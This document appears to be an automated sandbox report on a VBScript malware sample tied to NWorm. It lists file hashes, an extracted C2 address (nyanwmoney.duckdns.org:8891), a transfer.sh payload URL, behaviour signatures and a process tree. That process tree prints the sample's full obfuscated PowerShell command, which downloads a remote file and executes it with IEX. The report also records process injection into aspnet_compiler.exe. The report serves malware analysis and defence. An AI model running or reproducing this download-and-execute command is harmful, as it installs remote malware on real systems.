Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
08-03-2022 17:19
Static task
static1
Behavioral task
behavioral1
Sample
YBAXAKQXVYWIXQJDE.vbs
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
YBAXAKQXVYWIXQJDE.vbs
Resource
win10v2004-en-20220113
General
-
Target
YBAXAKQXVYWIXQJDE.vbs
-
Size
9KB
-
MD5
40f92eb4b46a3430167477d11dec4c9e
-
SHA1
515ad5cac3f5b9ed1e7a7e14d53a191a12193984
-
SHA256
8c4477fd5129d549aabcbbcab1950965f7f0e0c934a60043dc7d27e57252868f
-
SHA512
80de7c828aff509a8d0ddbee61f52ed1ade6a3b562f2aa51082eae7c1631fcdf58d375b94457261481b1a8bfc90033e275444d7f765dff7c0c6d99635408989e
Malware Config
Extracted
https://transfer.sh/get/8J0O0I/Server435.txt
Extracted
nworm
v0.3.8
nyanwmoney.duckdns.org:8891
594274bc
Signatures
-
NWorm
A TrickBot module used to propagate to vulnerable domain controllers.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POWERSHELL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2484 1372 POWERSHELL.exe -
Blocklisted process makes network request 1 IoCs
Processes:
POWERSHELL.exeflow pid process 8 2484 POWERSHELL.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4348 set thread context of 4284 4348 powershell.exe aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
POWERSHELL.exepowershell.exepid process 2484 POWERSHELL.exe 2484 POWERSHELL.exe 4348 powershell.exe 4348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
POWERSHELL.exepowershell.exedescription pid process Token: SeDebugPrivilege 2484 POWERSHELL.exe Token: SeDebugPrivilege 4348 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
POWERSHELL.exepowershell.exedescription pid process target process PID 2484 wrote to memory of 4348 2484 POWERSHELL.exe powershell.exe PID 2484 wrote to memory of 4348 2484 POWERSHELL.exe powershell.exe PID 4348 wrote to memory of 4284 4348 powershell.exe aspnet_compiler.exe PID 4348 wrote to memory of 4284 4348 powershell.exe aspnet_compiler.exe PID 4348 wrote to memory of 4284 4348 powershell.exe aspnet_compiler.exe PID 4348 wrote to memory of 4284 4348 powershell.exe aspnet_compiler.exe PID 4348 wrote to memory of 4284 4348 powershell.exe aspnet_compiler.exe PID 4348 wrote to memory of 4284 4348 powershell.exe aspnet_compiler.exe PID 4348 wrote to memory of 4284 4348 powershell.exe aspnet_compiler.exe PID 4348 wrote to memory of 4284 4348 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YBAXAKQXVYWIXQJDE.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_b)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_C)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_n)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_t)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_Ne)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_t)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_.W)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''));$XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE=('{2}{0}{1}' -f'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<w-O-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<b-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<j-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<e-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<c-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<t $-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<BB-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<).$H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<B(-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<$H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<x)-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<I-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`E-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`X(-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<Ne-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''));$HBBBBB = ($XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE -Join '')|I`E`X1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps12⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1MD5
96cbd4ee164e4feb93152e2ef2d0e229
SHA12f5963d3042b87d5e3684a8c1de74e3543aad81e
SHA2562926650956ac94279c598ba4b761eac9fa34e49e8fe19580adf8c62fd2fac15a
SHA51248df582b45e09a85e94d60502a1d5f68412ea1325d81ceb2256c5a142d09f4db57e2e6f746a55458276aa8d3d9af59ce66219489d9aa9b73c5dac2c8a7d27b5b
-
memory/2484-130-0x00000172798C0000-0x00000172798E2000-memory.dmpFilesize
136KB
-
memory/2484-132-0x0000017279920000-0x0000017279922000-memory.dmpFilesize
8KB
-
memory/2484-131-0x00007FFF7A220000-0x00007FFF7ACE1000-memory.dmpFilesize
10.8MB
-
memory/2484-133-0x0000017279923000-0x0000017279925000-memory.dmpFilesize
8KB
-
memory/2484-134-0x0000017279926000-0x0000017279928000-memory.dmpFilesize
8KB
-
memory/4284-142-0x0000000075000000-0x00000000757B0000-memory.dmpFilesize
7.7MB
-
memory/4284-141-0x0000000000400000-0x000000000040A000-memory.dmpFilesize
40KB
-
memory/4284-143-0x0000000005640000-0x0000000005641000-memory.dmpFilesize
4KB
-
memory/4284-144-0x0000000005650000-0x00000000056EC000-memory.dmpFilesize
624KB
-
memory/4284-145-0x0000000005CA0000-0x0000000006244000-memory.dmpFilesize
5.6MB
-
memory/4284-146-0x0000000005760000-0x00000000057C6000-memory.dmpFilesize
408KB
-
memory/4348-137-0x00007FFF7A220000-0x00007FFF7ACE1000-memory.dmpFilesize
10.8MB
-
memory/4348-138-0x000002074B970000-0x000002074B972000-memory.dmpFilesize
8KB
-
memory/4348-140-0x000002074B976000-0x000002074B978000-memory.dmpFilesize
8KB
-
memory/4348-139-0x000002074B973000-0x000002074B975000-memory.dmpFilesize
8KB
-
memory/4348-136-0x000002074D2F0000-0x000002074D30A000-memory.dmpFilesize
104KB